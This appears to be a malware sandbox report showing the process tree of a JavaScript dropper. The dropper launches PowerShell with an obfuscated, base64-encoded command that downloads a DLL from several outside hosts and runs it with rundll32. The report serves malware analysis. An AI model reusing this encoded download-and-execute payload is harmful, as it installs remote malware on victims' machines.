popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\CfnGTAbbbLsM.js

    2648

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAG4AawB5AGwAbwBwAHIAbwBjAHQAaQBhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBnAEEANQBBAEMANABBAE0AUQBBAHkAQQBEAGMAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQAVQBBAE4AUQBBAHYAQQBFADQAQQBPAFEAQgBYAEEAQwA4AEEAUQBnAEEAegBBAEEAPQA9AFYAVgByAG8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwBrAEEAZABBAEIAbwBBAEgAawBBAGIAUQBCAGgAQQBHAHcAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAegBBAEUANABBAGQAUQBCAHUAQQBHAE0AQQBhAEEAQgBoAEEARwBzAEEAZABRAEEAdQBBAEgAUQBBAGQAZwBBAHYAQQBEAGMAQQBjAFEAQgA1AEEAQwA4AEEAYwB3AEIAVwBBAEQAQQBBAFYAVgByAG8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQAzAEEARABJAEEATABnAEEAeQBBAEQAVQBBAE0AdwBBAHYAQQBHAFEAQQBUAEEAQgB5AEEARwB3AEEAVwBBAEEAeABBAEcASQBBAEwAdwBCAEIAQQBFAFkAQQBUAEEAQgBKAEEARQBrAEEAVQBnAEIAcwBBAEcAawBBAFoAUQBCAEcAQQBEAFUAQQBSAGcAQQA9AFYAVgByAG8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQAzAEEARABVAEEATABnAEEAeQBBAEQATQBBAE4AZwBBAHYAQQBGAEUAQQBjAEEAQgBRAEEASABFAEEATAB3AEIAbgBBAEYAWQBBAFEAZwBCAG0AQQBGAG8AQQBlAFEAQgBSAEEASABrAEEAYwBnAEEAPQBWAFYAcgBvAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHgAQQBEAEUAQQBNAHcAQQB2AEEARwBvAEEATgBBAEIAVQBBAEcAbwBBAGEAZwBCAHYAQQBEAFEAQQBMAHcAQgAyAEEARQAwAEEAWgB3AEIAVwBBAEUAVQBBAFQAdwBBADIAQQBHADgAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB3AG8AdAB0AGUAcwB0ACAAaQBuACAAJABhAG4AawB5AGwAbwBwAHIAbwBjAHQAaQBhACAALQBzAHAAbABpAHQAIAAiAFYAVgByAG8AIgApACAAewB0AHIAeQAgAHsAJAB1AG4AcwBxAHUAZQBhAG0AaQBzAGgAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHcAbwB0AHQAZQBzAHQAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJAB1AG4AcwBxAHUAZQBhAG0AaQBzAGgAbAB5ACAALQBPACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcAFIAZQBwAGEAYwBrAGEAZwBlAHMARABlAHYAZQBsAGkAbgBnAC4AZABsAGwAOwAkAFYAdQBsAGcAYQByAGkAcwBlAHIATQBhAG4AZABhAHIAaQBuAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBBAEEAdQBBAEQAYwBBAE4AZwBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABjAEEATwBRAEEAPQAiADsAJABtAGEAcgBlAG8AdABpAGMAVABlAHQAcgBpAGMAYQBsAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATwBRAEEAdQBBAEQAZwBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAUgBlAHAAYQBjAGsAYQBnAGUAcwBEAGUAdgBlAGwAaQBuAGcALgBkAGwAbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADgANAA4ADQAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBZAHcAQgB0AEEARwBRAEEASQBBAEEAdgBBAEcATQBBAEkAQQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwB3AEEAYgBBAEEAegBBAEQASQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBFAFEAQQBZAFEAQgAwAEEARwBFAEEAWABBAEIAUwBBAEcAVQBBAGMAQQBCAGgAQQBHAE0AQQBhAHcAQgBoAEEARwBjAEEAWgBRAEIAegBBAEUAUQBBAFoAUQBCADIAQQBHAFUAQQBiAEEAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcAUQBBAGIAQQBCAHMAQQBDAHcAQQBiAFEAQgAxAEEASABNAEEAZABBAEEANwBBAEEAPQA9ACIAOwAkAHUAbgBzAHQAaQBmAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAdgBBAEgAQQBBAFoAUQBCAHkAQQBHAE0AQQBkAFEAQgBzAEEARwBFAEEAYwBnAEIAUABBAEgAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgAwAEEAQwA0AEEAYQBBAEIAdQBBAEEAPQA9AHgAWABxAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWQB3AEIAaABBAEgASQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBZAEEAYQBRAEIAcwBBAEcAMABBAHgAWABxAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAFkAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAegBBAEEAPQA9AHgAWABxAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAaABBAEcAMABBAFoAUQBCAHUAQQBHAEUAQQBZAGcAQgBzAEEARwBVAEEAUwBBAEIAcABBAEgATQBBAGQAQQBCAGgAQQBHADAAQQBhAFEAQgB1AEEARwBrAEEAWQB3AEEAdQBBAEcATQBBAGIAdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

      2804

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf